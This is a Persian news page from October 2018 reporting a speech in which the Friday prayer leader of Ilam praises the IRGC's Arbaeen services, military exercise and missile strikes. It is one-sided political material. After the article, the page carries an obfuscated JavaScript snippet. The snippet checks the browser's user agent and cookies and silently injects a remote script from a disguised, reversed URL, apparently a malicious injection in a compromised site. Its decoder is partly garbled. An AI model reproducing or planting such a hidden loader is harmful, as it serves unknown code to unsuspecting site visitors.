دفتر مقام معظم رهبری
titreno.ir
حرف تو
تاریخ انتشار : 24 مهر 1397 - 22:39
کد مطلب: 49068
امام جمعه ایلام گفت: سپاه نهادی انقلابی و همواره در خط ولایت و پشتیبان نطام و انقلاب اسلامی بوده است.

به گزارش ایلام پویا، حجت‌الاسلام کریمی‌تبار عصر امروز در دیدار فرمانده سپاه امیر‌المومنین(ع) و جمعی از فرماندهان و مسئولان سپاه  و تیپ 11 حضرت امیر‌(ع) گفت: سپاه نهادی انقلابی و همواره در خط ولایت و پشتیبان نظام و انقلاب اسلامی بوده است و به تعبیر حضرت امام(ره) اگر سپاه نبود کشور هم نبود.

نماینده ولی‌فقیه در استان ایلام رزمایش اقتدار عاشورایی را یکی از موفقیت‌های سپاه پاسداران انقلاب اسلامی دانست و اظهار کرد: اقتدار عاشورایی نشان داد که اقتدار کشور غیرقابل خدشه است.
وی تمهیدات انجام شده توسط سپاه پاسداران در ارتباط با اربعین امسال را افتخاری برای سپاه دانست و خاطرنشان کرد: سپاه اثبات کرده است در هر جا حضور پیدا کند آن حضور خیر و برکت است و اقداماتی که برای زائران اربعین فراهم کرده است در خور تقدیر است.
امام جمعه ایلام افزود: اقتدارآفرینی سپاه در اقدام موشکی و به زبونی کشاندن ضد انقلاب در بیخ گوش اربابانشان نشان داد که  سیلی اقتداری گوش اربابان تروریست را پاره و آنان را به خود آورد که ترور و تهدید در مردم ایران بی‌اثر است.
وی ضمن توصیه به خودسازی و افزایش معنویت و فرهنگ ایثار و مقاومت افزود: نقش معنویت در انضباط ظاهری و معنوی سپاه پاسداران موثر و آن را تقویت کنید.
انتهای پیام/

;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();

دیدگاههای ارسال شده ، پس ازتأیید توسط مدیر سایت منتشر خواهد شد.
پیامهایی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
انتشار نظر به معنای تأیید از دید مسئول سایت نبوده و مسئولیت نظرات بر عهده نظردهنده است.

نظر شما

CAPTCHA ی تصویری
کاراکترهای نمایش داده شده در تصویر را وارد کنید.